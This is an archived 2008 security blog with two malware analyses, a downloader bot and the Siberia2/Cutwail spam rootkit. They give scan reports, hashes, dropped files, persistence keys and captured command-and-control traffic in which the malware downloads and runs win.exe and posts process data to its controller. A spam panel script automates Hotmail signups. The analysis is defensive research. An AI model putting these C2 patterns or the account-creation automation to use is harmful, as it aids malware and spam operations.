NoVirusThanks Blog » Spam.Bot

Serpent BOT (Web Based Malware)

admin — Sun, 23 Nov 2008 01:00:16 +0000

Steve sent me another sample of malware he found, but this time, we found a Web Based Malware with a web-interface:

The file that established connections with the website was named load.exe and below there is the report of the scan:

Report Generated 22.11.2008 at 23.15.36 (GMT 1)
Filename: load.exe
File size: 27 KB
MD5 Hash: 97A860C202A8016E08818F3AA90525B8
SHA1 Hash: CADF466ABD29CD993DD81EC838282589D0077BAC
CRC32: 89416946
Application Type: Executable (EXE) 32bit
Packer detected: Microsoft Visual C++ 6.0
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection Rate: 23 on 23

Antivirus Result
a-squared Trojan-Downloader.Agent!IK
Avira AntiVir TR/Dldr.Agent.agl
Avast Win32:Small-JMK [Trj] (0)
AVG Trojan horse Downloader.Zlob.12.R
BitDefender Trojan.Crypt.AI
ClamAV Worm.Socks-11
Comodo TrojWare.Win32.PSW.Agent.NHG
Dr.Web Trojan.PWS.Pace
Ewido Downloader.Agent.llo
F-PROT 6 W32/Socks.A.gen!Eldorado (generic, not disinfectable)
G DATA Trojan-Downloader.Win32.Agent.llo A
IkarusT3 Trojan-Downloader.Agent
Kaspersky Trojan-Downloader.Win32.Agent.llo
McAfee BackDoor-DRW trojan
MHR (Malware Hash Registry) Virus Found – detect rate 75%
NOD32 v3 Win32/PSW.Agent.NHG trojan
Norman Trojan W32/Agent.EXZF ()
QuickHeal TrojanDownloader.Agent.llo
Solo Antivirus Infection TrojanDropper.Win32.Small.Bgx
Sophos Troj/Dloadr-BMT
TrendMicro WORM_SOCKS.BL
VBA32 Trojan-Downloader.Win32.Agent.llo
VirusBuster Trojan.DL.Agent.ETEH

When I executed this load.exe file, a lot of traffic was established with this domain:

1	kolonka17.cn

Internet traffic:

1
2
3

GET /loader/?&v=ver&s=9988 HTTP/1.1
User-Agent: _
Host: kolonka17.cn

With the traffic below, another executable file named win.exe will be downloaded and executed in my system:

GET /loader/manda.php?id=-695459345&v=ver&s=9988 HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
 
HTTP/1.1 200 OK
Server: Apache/2
Content-length: 29
 
hxxp://kolonka17.cn/win.exe|5
 
GET /win.exe HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf

Next we see new traffic to a new domain, where it sends a lot of encrypted data:

GET /40E8001431303134393536323335383537393339333234386C0000018D66000000007600000642EB00053085858585 HTTP/1.0
Host: 69.147.239.106
 
HTTP/1.0 200 OK
Date: Sat, 22 Nov 2008 09:04:03 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch9
Last-Modified: Sat, 22 Nov 2008 09:04:03 GMT
Cache-Control: no-cache
Content-Length: 107532
Connection: close
Content-Type: application/octet-stream
...

And below there is some interesting traffic:

GET /loader/manda.php?id=-789987028&l=5&v=ver&s=9988 HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
 
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:06 GMT
Server: Apache/2
Content-Length: 2
 
ok
 
GET /loader/proc_kill HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
 
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:07 GMT
Server: Apache/2
Last-Modified: Wed, 12 Nov 2008 09:23:38 GMT
Content-Length: 185
Content-Type: text/plain
 
regedit.exe
msconfig.exe
taskmgr.exe
reg.exe
taskkill.exe
tskill.exe
tasklist.exe
infium.exe
notepad.exe
explorer.exe
nod32kui.exe
nod32kui.exe
egui.exe
egui.exe
putty.exe

The malware now gets the command to kill a list of processes on my system:

1	GET /loader/proc_kill HTTP/1.1

But the malware will not stop at just killing the processes! The malware will also delete some important executable files of the system, such as:

1	C:\WINDOWS\explorer.exe

In the new traffic below we can see the malware received another command:

GET /loader/proc_run HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
 
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:14 GMT
Server: Apache/2
Content-Length: 30
Content-Type: text/plain
 
none.exe
taskmon.exe
qip.exe
 
GET /loader/proc_killsize HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
 
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:10 GMT
Server: Apache/2
Content-Length: 40
Content-Type: text/plain
 
tasklis2t.exe
inf3ium.exe
note4pad.exe

And is always related to process killing. After, we sent new traffic to the domain:

POST /loader/data.php?id=-789987028 HTTP/1.1
Host: kolonka17.cn
Content-Type: application/x-www-form-urlencoded
Content-length: 289
 
proc=[System Process]
smss.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
svchost.exe
spoolsv.exe
explorer.exe
alg.exe
wscntfy.exe
ufo.exe
load.exe
14B.tmp
size=12800
0
0
0
108032
13312
14336
57856
13824
51200
27648
12800
 
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:22 GMT
Content-Length: 0
Content-Type: text/html

We can see the malware has sent some information related to the current running processes of my system !! But note we have also sent the size of each process ! This information can be used by future malware versions, maybe to create some evading-code or to detect certain processes “not much loved” by the malware.

Next we received some traffic in the SMTP (25) port:

Protocol          : TCP
Local Address     : 64.233.183.27
Local Port        : 25
 
220 mx.google.com ESMTP k5si310246nfh.0
 
Protocol          : TCP
Local Address     : 209.85.135.114
Local Port        : 25
 
220 mx.google.com ESMTP n10si1763302mue.37
 
Protocol          : TCP
Local Address     : 94.100.176.20
Local Port        : 25
 
220 Mail.Ru ESMTP
 
Protocol          : TCP
Local Address     : 216.157.145.27
Local Port        : 25
 
220 mail7.hsphere.cc ESMTP mail7.hsphere.cc; Sat Nov 22 09:20:00 2008

And a new driver is loaded by the malware:

1	C:\WINDOWS\system32\drivers\Winkk44.sys

Report of the scan:

Report Generated 22.11.2008 at 23.32.46 (GMT 1)
Filename: Winkk44.sys
File size: 32 KB
MD5 Hash: 286C4C43EFED1D81C59AA7BC70B83BD8
SHA1 Hash: 4D09AC6BE2808360697E7ECA71BEBF7CADFDE985
CRC32: 2495620378
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found [Overlay] *
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection Rate: 7 on 24

Antivirus Result
a-squared Trojan-Dropper.Cutwail!IK
Avira AntiVir -
Avast -
AVG Virus found BackDoor.Ntrootkit
BitDefender Trojan.Dropper.Cutwail.D
ClamAV -
Comodo -
Dr.Web -
Ewido -
F-PROT 6 -
G DATA Trojan-Downloader.Win32.Mutant.aim A
IkarusT3 Trojan-Dropper.Cutwail
Kaspersky Trojan-Downloader.Win32.Mutant.aim
McAfee -
MHR (Malware Hash Registry) -
NOD32 v3 -
Norman -
Panda -
QuickHeal -
Solo Antivirus Infection TrojanDownloader.Win32.Mutant.Aim
Sophos -
TrendMicro -
VBA32 -
VirusBuster -

Again a Trojan.Dropper.Cutwail.D !

Below there are some interested strings extracted from Winkk44.sys:

winlogon.exe
e:\0soft\loader\runtime3\objfre_wxp_x86\i386\runtime3.pdb
EXERESOURCE
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\WinCtrl32
Asynchronous
Impersonate
StartShell
DLLName
WLEventStartShell
WinCtrl32.dll
\SystemRoot\system32\WinCtrl32.dll
ImagePath
Start
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\
\DosDevices\Rntm74
\Device\Rntm74
\SystemRoot\system32\drivers\
\FileSystem
Winkk44.sys

As we can see from the image below, this driver is auto-loaded when the Operating System boots in Safe Mode:

During the analysis, were not detected SSDT/Shadow SSDT Hooks, no Stealth Code, I get BSOD when trying to open certain Anti-Rootkit software, the file Winkk44_sys is protected from changing/modification/deletion and also the registry keys are protected from changing/modification/deletion.

Running processes that are visible with taskmanager:

Registry keys used by the malware to startup with Windows:

Service info:

These are the malware traces we can see from an HijackThis log:

Running processes:
C:\WINDOWS\system32\drivers\ctfmon.exe
%User%\Local Settings\Application Data\spool.exe
%User%\Local Settings\Application Data\spool.exe
%User%\Local Settings\Application Data\spool.exe
 
O2 - BHO: pl - {B200799F-9538-403d-9A6E-36F5942EC540} - C:\WINDOWS\system32\fklame32.dll (file missing)
O4 - HKLM\..\Run: [ntuser] C:\WINDOWS\system32\drivers\ctfmon.exe
O4 - HKLM\..\Run: [autoload] %User%\Local Settings\Application Data\spool.exe
O4 - HKCU\..\Run: [ntuser] C:\WINDOWS\system32\drivers\ctfmon.exe
O4 - HKCU\..\Run: [autoload] %User%\Local Settings\Application Data\spool.exe
O4 - HKUS\S-1-5-18\..\Run: [ntuser] C:\WINDOWS\system32\drivers\ctfmon.exe (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\Run: [autoload] C:\Documents and Settings\LocalService\Local Settings\Application Data\spool.exe (User 'SYSTEM')
O20 - Winlogon Notify: WinCtrl32 - C:\WINDOWS\SYSTEM32\WinCtrl32.dll
O23 - Service: Task Scheduler (Schedule) - Unknown owner - C:\WINDOWS\system32\drivers\ctfmon.exe

Below there is a small summary of the files created by the malware:

C:\WINDOWS\system32\ctfmon.exe
%User%\Local Settings\Application Data\spool.exe
%User%\ftpdll.dll
C:\WINDOWS\system32\WinCtrl32.dll
C:\WINDOWS\system32\fklame32.dll
C:\WINDOWS\system32\drivers\ctfmon.exe
C:\WINDOWS\system32\drivers\Winkk44.sys
C:\WINDOWS\system32\drivers\555.exe

Rootkit.Siberia2 + Rootkit.Cutwail.A – Analysis

admin — Thu, 20 Nov 2008 18:04:54 +0000

Analysis Content: Rootkit.Siberia2 + Rootkit.Cutwail.A – Analysis
Released: 20.11.2008
Author of Analysis: Robert
Contact: robert@novirusthanks.org
Website: http://novirusthanks.org

Steve sent me another rootkit sample and here is the analysis : )

The file I received was named mtnjmcjubjjuyto.exe and below there is the report of the scan:

Report Generated 20.11.2008 at 16.47.12 (GMT 1)
Time for scan: 22 seconds
Filename: mtnjmcjubjjuyto.exe
File size: 9 KBF
MD5 Hash: 7499B7C5951B6A46689E5C387EFADC66
SHA1 Hash: 056FE023F0906C9C99E16674D6E673C39823BF84
CRC32: 1125039963
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found *
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
ASCII Strings: View
Detection Rate: 9 on 23

Antivirus Result
a-squared Trojan.Win32.Meredrop!IK
Avira AntiVir HEUR/Crypted
Avast Nothing found!
AVG Trojan horse Downloader.Generic_r.BT
BitDefender Nothing found!
ClamAV Nothing found!
Comodo Nothing found!
Dr.Web Nothing found!
Ewido Nothing found!
F-PROT 6 Nothing found!
G DATA Trojan-Downloader.Win32.Agent.apsz A
IkarusT3 Trojan.Win32.Meredrop
Kaspersky Trojan-Downloader.Win32.Agent.apsz
McAfee Generic Dropper trojan
NOD32 v3 probably a variant of Win32/Kryptik.BJ trojan
Norman Nothing found!
Panda Nothing found!
QuickHeal Nothing found!
Solo Antivirus Nothing found!
Sophos Sus/Behav-273
TrendMicro Nothing found!
VBA32 Nothing found!
VirusBuster Nothing found!

After the execution of the above file, were created new files:

C:\ebafud.exe
C:\WINDOWS\system32\rs32net.exe

And a new process was visible in Task Manager with the name of rs32net.exe.

Below there is the report of the scan:

Report Generated 20.11.2008 at 16.53.35 (GMT 1)
Time for scan: 29 seconds
Filename: rs32net.exe
File size: 22 KB
MD5 Hash: D3185511968F2F5A8A68FA9F67CCED2F
SHA1 Hash: 4254F0920877984724446BF6BCF0E764E27ADF07
CRC32: 1940657006
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found *
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
ASCII Strings: View
Detection Rate: 1 on 23

Antivirus Result
a-squared Nothing found!
Avira AntiVir TR/Dropper.Gen
Avast Nothing found!
AVG Nothing found!
BitDefender Nothing found!
ClamAV Nothing found!
Comodo Nothing found!
Dr.Web Nothing found!
Ewido Nothing found!
F-PROT 6 Nothing found!
G DATA Nothing found!
IkarusT3 Nothing found!
Kaspersky Nothing found!
McAfee Nothing found!
NOD32 v3 Nothing found!
Norman Nothing found!
Panda Nothing found!
QuickHeal Nothing found!
Solo Antivirus Nothing found!
Sophos Nothing found!
TrendMicro Nothing found!
VBA32 Nothing found!
VirusBuster Nothing found!

New files were created after some seconds:

C:\njkkjh.exe
C:\nfgo.exe
C:\duhtvwns.exe
C:\WINDOWS\system32\jsne87fidgf.dll
C:\DOCUME~1\user899\LOCALS~1\Temp\winlogin.exe

Report Generated 20.11.2008 at 16.51.56 (GMT 1)
Time for scan: 26 seconds
Filename: jsne87fidgf.dll
File size: 9 KB
MD5 Hash: 619BF3607989002B551E830ED151E8D9
SHA1 Hash: C0776DD69B723793D477CD05A0C18236A319491D
CRC32: 3590387388
Application Type: Dinamyc Link Library (DLL) 32bit
Packer detected: Nothing found [Overlay] *
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
ASCII Strings: View
Detection Rate: 3 on 23

Antivirus Result
a-squared Trojan-Clicker.Win32.Klik!IK
Avira AntiVir TR/Fakealert.HO
Avast Nothing found!
AVG Nothing found!
BitDefender Nothing found!
ClamAV Nothing found!
Comodo Nothing found!
Dr.Web Nothing found!
Ewido Nothing found!
F-PROT 6 Nothing found!
G DATA Nothing found!
IkarusT3 Nothing found!
Kaspersky Nothing found!
McAfee Nothing found!
NOD32 v3 Nothing found!
Norman Nothing found!
Panda Nothing found!
QuickHeal Nothing found!
Solo Antivirus Nothing found!
Sophos Troj/Agent-IHC
TrendMicro Nothing found!
VBA32 Nothing found!
VirusBuster Nothing found!

We can see that this .DLL looks like a BHO (Browser Helper Objects) and it is injected into 2 processes:
-IEXPLORE.EXE
-explorer.exe

Below there is the report of the scan of winlogin.exe:

Report Generated 20.11.2008 at 17.00.37 (GMT 1)
Time for scan: 29 seconds
Filename: winlogin.exe
File size: 14 KB
MD5 Hash: FA14206DC72A8EC78B0D3E07F1DB8F73
SHA1 Hash: 1ABD0114E7AEFA3381B95BADCE96AE9294D0D7AF
CRC32: 4292284846
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found [Overlay] *
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
ASCII Strings: View
Detection Rate: 5 on 23

Antivirus Result
a-squared Trojan-Clicker.Win32.Klik!IK
Avira AntiVir TR/Fakealert.HO
Avast Nothing found!
AVG Nothing found!
BitDefender Nothing found!
ClamAV Nothing found!
Comodo Nothing found!
Dr.Web Nothing found!
Ewido Nothing found!
F-PROT 6 Nothing found!
G DATA Nothing found!
IkarusT3 Nothing found!
Kaspersky Nothing found!
McAfee Generic FakeAlert.d trojan
NOD32 v3 Nothing found!
Norman Nothing found!
Panda Nothing found!
QuickHeal Nothing found!
Solo Antivirus Nothing found!
Sophos Troj/Dloadr-CAD
TrendMicro Nothing found!
VBA32 Win32 Shadow AutoStart Install
VirusBuster Nothing found!

After, new files were created:

C:\psqrhqn.exe
C:\DOCUME~1\user899\LOCALS~1\Temp\bat9.tmp.bat
C:\mfglmypk.exe
C:\DOCUME~1\user899\LOCALS~1\Temp\BAT9TM~1.BAT
C:\cvqkuk.exe
C:\naxv.exe
C:\WINDOWS\system32\fklame32.dll
C:\cvqkuk.exe
C:\nriljal.exe

Report Generated 20.11.2008 at 17.06.19 (GMT 1)
Time for scan: 23 seconds
Filename: fklame32.dll
File size: 22 KB
MD5 Hash: F049A08DD65E4AB04575B3667E56A408
SHA1 Hash: 1F0270794587CB51B514CFDA5B040C08CDD18212
CRC32: 733835836
Application Type: Dinamyc Link Library (DLL) 32bit
Packer detected: Nothing found *
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
ASCII Strings: View
Detection Rate: 9 on 23

Antivirus Result
a-squared Trojan.Win32.BHO.d!IK
Avira AntiVir TR/BHO.Gen
Avast Nothing found!
AVG Nothing found!
BitDefender Trojan.Generic.1134607
ClamAV Nothing found!
Comodo Nothing found!
Dr.Web Nothing found!
Ewido Nothing found!
F-PROT 6 Nothing found!
G DATA Trojan.Win32.BHO.ibp A
IkarusT3 Trojan.Win32.BHO.d
Kaspersky Trojan.Win32.BHO.ibp
McAfee Generic.dx trojan
NOD32 v3 Nothing found!
Norman Nothing found!
Panda Nothing found!
QuickHeal Nothing found!
Solo Antivirus Nothing found!
Sophos Mal/Emogen-G
TrendMicro Nothing found!
VBA32 Trojan.Win32.BHO.ibp
VirusBuster Nothing found!

Report Generated 20.11.2008 at 17.11.00 (GMT 1)
Time for scan: 26 seconds
Filename: naxv.exe
File size: 172 KB
MD5 Hash: 1EDB6B045A907E4F63EAFBCA43E8660E
SHA1 Hash: E7B6CF6D1BC634F3F96D8EDA786F056B614EA6BC
CRC32: 1878180187
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found *
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
ASCII Strings: View
Detection Rate: 3 on 23

Antivirus Result
a-squared Nothing found!
Avira AntiVir Nothing found!
Avast Nothing found!
AVG Nothing found!
BitDefender Nothing found!
ClamAV Nothing found!
Comodo Nothing found!
Dr.Web Nothing found!
Ewido Nothing found!
F-PROT 6 W32/FakeAlert.3!Maximus
G DATA Nothing found!
IkarusT3 Nothing found!
Kaspersky Nothing found!
McAfee Nothing found!
NOD32 v3 a variant of Win32/Kryptik.BX trojan
Norman Nothing found!
Panda Nothing found!
QuickHeal Suspicious
Solo Antivirus Nothing found!
Sophos Nothing found!
TrendMicro Nothing found!
VBA32 Nothing found!
VirusBuster Nothing found!

The file named fklame32.dll was injected in 2 processes:
-IEXPLORE.EXE
-explorer.exe

Another files were created:

C:\DOCUME~1\user899\LOCALS~1\Temp\newbot.exe
C:\DOCUME~1\user899\LOCALS~1\Temp\csrssc.exe => Has attribute +H (Hidden)
C:\DOCUME~1\user899\LOCALS~1\Temp\loader.exe
C:\DOCUME~1\user899\LOCALS~1\Temp\2029295898.exe
C:\DOCUME~1\user899\LOCALS~1\Temp\2155777770.exe
C:\DOCUME~1\user899\LOCALS~1\Temp\2165992458.exe
C:\WINDOWS\system32\bdedabafadb.dll

Report Generated 20.11.2008 at 17.17.38 (GMT 1)
Time for scan: 27 seconds
Filename: newbot.exe
File size: 71 KB
MD5 Hash: 29A9BDF7B39FFDC8AC8AE4EFEB540E35
SHA1 Hash: 681E92D08A374E8086303A9E453727BF609B283B
CRC32: 2651006629
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found *
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
ASCII Strings: View
Detection Rate: 2 on 23

Antivirus Result
a-squared Nothing found!
Avira AntiVir Nothing found!
Avast Nothing found!
AVG Nothing found!
BitDefender Nothing found!
ClamAV Nothing found!
Comodo Nothing found!
Dr.Web Nothing found!
Ewido Nothing found!
F-PROT 6 Nothing found!
G DATA Trojan.Win32.Inject.kdz A
IkarusT3 Nothing found!
Kaspersky Trojan.Win32.Inject.kdz
McAfee Nothing found!
NOD32 v3 Nothing found!
Norman Nothing found!
Panda Nothing found!
QuickHeal Nothing found!
Solo Antivirus Nothing found!
Sophos Nothing found!
TrendMicro Nothing found!
VBA32 Nothing found!
VirusBuster Nothing found!

After, the file named bdedabafadb.dll was injected in explorer.exe and another file was created:

C:\Documents and Settings\user899\Application Data\gadcom\gadcom.exe

And was created also a new directory:

C:\WINDOWS\tsd532

Report Generated 20.11.2008 at 17.26.58 (GMT 1)
Time for scan: 24 seconds
Filename: gadcom.exe
File size: 55 KB
MD5 Hash: 3C4A94886E1A2C015CA9758E69A4A33B
SHA1 Hash: 6D86EB185C7DEC2E1FD7C4BD3291D5357CA2CA2B
CRC32: 1614352094
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found *
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
ASCII Strings: View
Detection Rate: 5 on 23

Antivirus Result
a-squared Trojan.Win32.Matcash!IK
Avira AntiVir Nothing found!
Avast Nothing found!
AVG Nothing found!
BitDefender Nothing found!
ClamAV Nothing found!
Comodo Nothing found!
Dr.Web Nothing found!
Ewido Nothing found!
F-PROT 6 Nothing found!
G DATA Trojan.Win32.Agent.aorq A
IkarusT3 Trojan.Win32.Matcash
Kaspersky Heur.Trojan.Generic
McAfee Nothing found!
NOD32 v3 Nothing found!
Norman Nothing found!
Panda Nothing found!
QuickHeal Nothing found!
Solo Antivirus Nothing found!
Sophos Nothing found!
TrendMicro Nothing found!
VBA32 Win32.Trojan-Downloader
VirusBuster Nothing found!

And now 2 interesting files were created in C:\WINDOWS\system32\drivers\:

C:\WINDOWS\system32\drivers\ati5ssxx.sys
C:\WINDOWS\system32\drivers\tcpsr.sys

Report Generated 20.11.2008 at 15.21.44 (GMT 1)
Time for scan: 24 seconds
Filename: ati5ssxx.kdmp
File size: 32 KB
MD5 Hash: F8D0B66BD259EBC5D1C9B4C347CC684B
SHA1 Hash: CEB0ED5C79626383158E2396F248C0CA8A796A06
CRC32: 3826122122
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found *
Self-Extract Archive: Nothing found
Binder Detector: File is possible binded with malware
ASCII Strings: View
Detection Rate: 8 on 23

Antivirus Result
a-squared Rootkit.Win32.Protector!IK
Avira AntiVir RKIT/Protector.BC
Avast Nothing found!
AVG Trojan horse Rootkit-Agent.AV
BitDefender Trojan.Kobcka.FB
ClamAV Trojan.Rootkit.Protector-1
Comodo Nothing found!
Dr.Web Nothing found!
Ewido Nothing found!
F-PROT 6 Nothing found!
G DATA Nothing found!
IkarusT3 Rootkit.Win32.Protector
Kaspersky Nothing found!
McAfee Nothing found!
NOD32 v3 Nothing found!
Norman Nothing found!
Panda Nothing found!
QuickHeal Nothing found!
Solo Antivirus Nothing found!
Sophos Nothing found!
TrendMicro Nothing found!
VBA32 Nothing found!
VirusBuster Rootkit.Siberia.Gen

Below there are some interested strings extracted from the code:

ntoskrnl.exe
RSDS
d:\programs\siberia2\protect\objfre_wxp_x86\i386\protect.pdb
services.exe
d:\programs\siberia2\innerdrv\objfre_wxp_x86\i386\InnerDrv.pdb

RtlAppendUnicodeStringToString
wcslen
memset
ObfDereferenceObject
strcmp
PsLookupProcessByProcessId
PsTerminateSystemThread
KeDelayExecutionThread
ZwClose
PsCreateSystemThread
wcsncpy
ZwQueryValueKey
RtlInitUnicodeString
ZwOpenKey
wcsncat
wcscpy
PsSetCreateProcessNotifyRoutine
IoDeleteDevice
IoCreateSymbolicLink
IoCreateDevice
IofCompleteRequest
ZwWriteFile
ZwCreateFile
IoRegisterFsRegistrationChange
KeInitializeMutex
ObReferenceObjectByName
IoDriverObjectType
RtlAppendUnicodeToString
ZwQueryDirectoryObject
ZwOpenDirectoryObject
KeReleaseMutex
KeWaitForSingleObject
memcpy
ExAllocatePoolWithTag
ExFreePoolWithTag
MmIsAddressValid
CmRegisterCallback
ExInitializeResourceLite
KeLeaveCriticalRegion
ExReleaseResourceLite
ExAcquireResourceExclusiveLite
KeEnterCriticalRegion
RtlCopyUnicodeString
RtlCompareUnicodeString
ExAcquireResourceSharedLite
ObQueryNameString
ZwEnumerateValueKey
ExQueueWorkItem
ZwSetValueKey
ZwCreateKey
ZwQuerySystemInformation
PsLookupThreadByThreadId
wcscmp
KeUnstackDetachProcess
KeStackAttachProcess
ZwAllocateVirtualMemory
ZwOpenProcess
KeInsertQueueApc
KeInitializeApc
NtBuildNumber
ntoskrnl.exe

memcpy
ExFreePoolWithTag
ExAllocatePoolWithTag
ZwQuerySystemInformation
ntoskrnl.exe

\SystemRoot\system32\drivers\
services.exe
ImagePath
Start
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\
\DosDevices\Prot3
\Device\Prot3
\FileSystem
CSDVersion
\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control\Windows

So this rootkit looks like to has got a name:
siberia2

We can see that the driver add itself to the Safe Boot:

\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\

This mean that if you will start Windows in Safe Mode the driver will be automatic loaded with the other trusted drivers !

Report of the scan of tcpsr.sys:

Report Generated 20.11.2008 at 15.21.44 (GMT 1)
Time for scan: 24 seconds
Filename: tcpsr.dmp
File size: 8 KB
MD5 Hash: D29B23728B03BED296C9DF4AC1B34303
SHA1 Hash: 34BCB3149A57C9B7A95BE29EA96EA5B18E678E42
CRC32: 2830732520
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found [Overlay] *
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
ASCII Strings: View
Detection Rate: 2 on 23

Antivirus Result
a-squared Nothing found!
Avira AntiVir Nothing found!
Avast Nothing found!
AVG Trojan horse SpamBot.G
BitDefender Rootkit.Cutwail.A
ClamAV Nothing found!
Comodo Nothing found!
Dr.Web Nothing found!
Ewido Nothing found!
F-PROT 6 Nothing found!
G DATA Nothing found!
IkarusT3 Nothing found!
Kaspersky Nothing found!
McAfee Nothing found!
NOD32 v3 Nothing found!
Norman Nothing found!
Panda Nothing found!
QuickHeal Nothing found!
Solo Antivirus Nothing found!
Sophos Nothing found!
TrendMicro Nothing found!
VBA32 Nothing found!
VirusBuster Nothing found!

We can extract other interested strings from the code:

hxxp://bestdiabetesdrugs.com/?
hxxp://mexicandrugstor.com/?
hxxp://superdrugsworld.com/?
hxxp://superdrugssite.com/?
hxxp://bestanxietydrugs.com/?
hxxp://georgescheapdrugs.com/?
hxxp://buydrugsonlinehere.com/?
hxxp://ulcerdrugsonline.com/?
hxxp://bestdrugsinternational.com/?
hxxp://besttopicaldrugs.com/?

d:\programs\mailgrab\drv\objchk_wxp_x86\i386\filt.pdb
IoDeleteDevice
IoCreateSymbolicLink
IoCreateDevice
RtlInitUnicodeString
IofCompleteRequest
IoDeleteSymbolicLink
ExFreePoolWithTag
ExAllocatePool
memcpy
memset
MmMapLockedPages
KeTickCount
KeBugCheckEx
ntoskrnl.exe
KfReleaseSpinLock
KfAcquireSpinLock
HAL.dll
NdisDeregisterProtocol
NdisRegisterProtocol
NdisInitUnicodeString
NDIS_BUFFER_TO_SPAN_PAGES
NdisQueryBufferOffset
NdisAllocateMemory
NdisFreeMemory
NDIS.SYS

\DosDevices\Filt
\Device\Filt
ndarProtocol

So this rootkit should be named as:
mailgrab

And should be used for spam activity as we can see also from the detection name of AVG:
Trojan horse SpamBot.G

And now lets do a little analysis:

This rootkit variants seem pretty nasty, there aren’t SSDT / ShadowSSDT Hooks detected, if you use certain Anti-Rootkit software you’ll get a BSOD, rootkit driver is started also in Safe Mode Normal / Network Support, you cannot modify/change/delete any registry key that is related to the rootkit drivers, you cannot modify/change/delete the 2 files with extension .SYS that were created !!! The drivers seem to install hooks not only in Ntfs.sys and Fastfat.sys, but (if I am not wrong) also in:
-FltMgr.sys
-mrxdav.sys
-mrxsmb.sys
-Msfs.sys
-Mup.sys
-Npsf.sys
-Netbios.sys
-rdbss.sys
-sr.sys
-srv.sys

Also if you boot Windows in Safe Mode (at least in my case) the second driver named tcpsr.sys will be automatic deleted !

Apparently this rootkit seems to be the boss of the OS : )

Now lets see some images:

Suspicious drivers modifications/hooks:

No SSDT hooks detected

Stealth code detected

Visible processes

Kernel Modifications (here I used Kernel Detective by GamingMasteR of at4re)

registry startup keys

Below there is some (different from the other analysis) Internet Traffic that we received with the malware:

GET /?bot_id=0&mode=1 HTTP/1.1
User-Agent: imrabot
Host: sys368.3fn.net:3084
Cache-Control: no-cache

When I browsed the link it looked like a Spam Control Panel or similar related to spam:

1100000
*@live[*
*.live[*
*hotmail*
*@msn[*
*.msn[*
*@msnaccountservices.*
*@atdmt[*
*@advertising[*
*msnportal*
*pointroll[*
*doubleclick[*

http://get.live.com/mail/overview

2, fail wait page with GetFree button
OmnitureInterface.buttonNotification

3, fail click GetFree button
a
OmnitureInterface.buttonNotification

4, fail wait reg page
join.msn.com
signup.live.com
logout.aspx

logout.aspx

a
logout.aspx

14, fail wait reg page after logout
join.msn.com
signup.live.com

https://signup.live.com/newuserdl.aspx?mkt=en-us&revipc=US&ru=http://mail.live.com/?newuser=yes&rx=http://get.live.com/mail/options&rollrs=04&lic=1

5, fail wait English reg page
submitForCP
reg
logout.aspx

logout.aspx

a
logout.aspx

id
iFirstName
Names

id
iLastName
Surnames

input
id
iGenderMale

id
iBirthYear
YearsOfBorn

...

...

After, started again the same aggressive Spam Activity as all the other rootkit analysis.

And below there is the HiJackThis Log:

Logfile of Trend Micro HijackThis v2.0.0 (BETA)
Scan saved at 4:12:49 PM, on 11/20/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\savedump.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\DOCUME~1\user899\LOCALS~1\Temp\winlogin.exe
C:\Documents and Settings\user899\Application Data\gadcom\gadcom.exe
C:\WINDOWS\system32\wscntfy.exe

